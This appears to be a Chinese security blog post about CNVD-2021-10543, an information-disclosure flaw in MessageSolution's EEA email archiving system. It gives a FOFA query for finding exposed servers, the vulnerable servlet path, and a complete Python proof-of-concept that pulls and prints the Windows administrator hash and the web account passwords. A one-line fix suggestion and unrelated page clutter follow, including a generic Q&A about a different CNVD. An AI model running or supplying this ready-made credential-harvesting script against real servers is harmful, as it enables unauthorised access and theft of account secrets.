CNVD-2021-10543 -- MessageSolution 邮件归档系统EEA 信息泄露漏洞

0X001前言

MessageSolution是企业电子邮件归档软件的开发商。MessageSolution企业邮件归档管理系统EEA存在信息泄露漏洞。

0X002 漏洞影响

攻击者可利用漏洞获取Windows服务器administrator hash与web账号密码等敏感信息。

0X003 漏洞原理

通过访问敏感的文件获取到MessageSolution企业电子邮件的登陆信息,从而进行登陆

0X004 漏洞复现

0X041 空间搜索寻找目标

搜索语法: title="MessageSolution Enterprise Email Archiving (EEA)"

在这里插入图片描述

0X042获取敏感信息

在这里插入图片描述

访问地址: ip/authenticationserverservlet/

在这里插入图片描述
右键查看源代码,方便阅读

访问地址: view-source:https://ip/authenticationserverservlet/

在这里插入图片描述

在这里插入图片描述

登陆成功

在这里插入图片描述

0X005 POC

# CNVD-2021-10543
# MessageSolution 企业邮件归档管理系统 EEA 存在信息泄露漏洞
# fofa: title="MessageSolution"

import requests
import time
import json
from bs4 import BeautifulSoup
# 忽略SSL证书校验提醒
requests.packages.urllib3.disable_warnings()

def title():
    print("+-------------------------------------------------+")
    print("+-----------    CNVD-2021-10543   ----------------+")
    print("+----------- MessageSolution信息泄漏 --------------+")
    print('+--------- Fofa: title="MessageSolution" ---------+')
    print("+--------  use: python3 CNVD-2021-10543.py -------+")
    print("+-------------------------------------------------+")

def target_url(url):
    target_url = url + "/authenticationserverservlet/"
    login_url = url + "/indexcommon.jsp"
    # verify = False 忽略SSL证书校验
    try:
        #发起get请求
        res = requests.get(url=target_url, verify=False,timeout=5)
        if "administrator" in res.text and res.status_code == 200:
            print(f"[!] \033[31m目标系统: {url} 存在信息泄漏\033[0m")
            #系统休眠
            time.sleep(1)
            print("[!] \033[31m正在获取目标系统敏感信息.........\033[0m")
            #解析页面
            bs_xml = BeautifulSoup(res.text,features="html.parser")
            #获取administratorusername,administratorpassword,username,password
            administratorusername = bs_xml.findAll('administratorusername')
            administratorpassword_hash = bs_xml.findAll('administratorpassword')
            user_names = bs_xml.findAll('username')
            passwords = bs_xml.findAll('password')
            i = 1
            print(f"[!] \033[31m获取到目标系统信息:\033[0m")
            print(f"\033[32m[0] 获取windows系统用户和hash\033[0m")
            print(f"用户名: {administratorusername[0].text}    hash: {administratorpassword_hash[0].text}")
            print(f"\033[32m[1] Web用户和密码\033[0m")
            if i < len(user_names):
                for user_name,password  in zip(user_names,passwords):
                    print(f"用户名: {user_name.text}    密  码: {password.text}")
                    i = i+1
            else:
                print(f"用户名: {user_names[0].text}    密  码: {passwords[0].text}")
            print(f"[!]\033[31m请访问: {login_url} 进行登录!")
        else:
            print(f"[0]\033[32m目标系统: {url} 不存在信息泄\033[0m")
    except Exception as e:
        print(f"[!]  目标系统: {url} 出现意外错误:\n {e}")




if __name__ == "__main__":
    title()
    url = str(input("[0] 请输入目标站点URL:\n"))
    target_url(url)

在这里插入图片描述

0X006 修复建议

可以使用非常规的目录名称,如果能删除也可以删除或者正确设置权限,禁止用户访问。

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
### 回答1: cnvd-2021-16886是一个漏洞编号,代表某个具体的漏洞。利用脚本是指通过编写特定的代码脚本来利用该漏洞。 在利用cnvd-2021-16886漏洞时,可以通过编写脚本来自动化攻击过程,提高攻击效率和成功率。脚本可以使用各种编程语言编写,比如Python、Ruby、Perl等,根据具体需求来选择适合的编程语言。 脚本的编写可以包括以下步骤: 1. 了解漏洞:仔细研究cnvd-2021-16886漏洞的细节和原理,了解漏洞的利用方式和可能造成的影响。 2. 分析目标:确定攻击的目标,包括具体运行漏洞的应用、系统版本等信息。 3. 编写代码:根据漏洞的利用方式和目标的特点,编写相关代码段。这些代码段可能包含如发送特定的恶意请求以触发漏洞、获取目标系统的权限等功能。 4. 测试和优化:在合适的环境下测试编写的脚本,确保其能够成功利用cnvd-2021-16886漏洞。如果有问题或不完善的地方,需要进行调试和优化。 需要注意的是,利用漏洞是非法的行为,可能会导致法律问题和伦理问题。在进行漏洞利用时,应遵守法律法规并获得合法授权,比如在合法的渗透测试范围内进行。 ### 回答2: cnvd-2021-16886 是一个漏洞标识符,用于标识2021年的一个特定漏洞。根据我的了解,我将用300字的篇幅来回答利用这一漏洞的脚本。 cnvd-2021-16886 是一种远程代码执行漏洞,该漏洞存在于某个软件的特定版本中。通过利用这一漏洞,攻击者可以执行恶意代码,并可能获取对受影响系统的控制。 要利用这一漏洞,攻击者可以使用特定的脚本代码来构造定制的攻击载荷。这个脚本可能会利用漏洞中存在的软件错误,以执行恶意代码或利用系统的弱点。攻击者可以通过网络将这个攻击载荷发送到受影响的系统,从而实现攻击的目的。 脚本通常是用编程语言编写的一组指令,用于自动执行一系列任务。在利用 cnvd-2021-16886 漏洞时,攻击者可能会创建一个定制的脚本,以利用漏洞中存在的软件错误。这个脚本可能包含诸如代码注入、命令执行、文件包含等恶意操作,以便攻击者获取对系统的完全控制或进行其他恶意活动。 为了保护受影响的系统免受这一漏洞的攻击,管理员们应该立即采取行动。这包括及时升级软件以修复漏洞,或者使用补丁程序来修复软件中的错误。此外,还应增加系统的安全性,例如通过配置防火墙、加密通信和访问控制等手段来加强系统防御能力。 总之,通过利用脚本来利用 cnvd-2021-16886 漏洞,攻击者可以执行恶意代码并可能获取对受影响系统的控制。为了保护系统安全,及时修复漏洞并加强系统的安全配置是必要的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值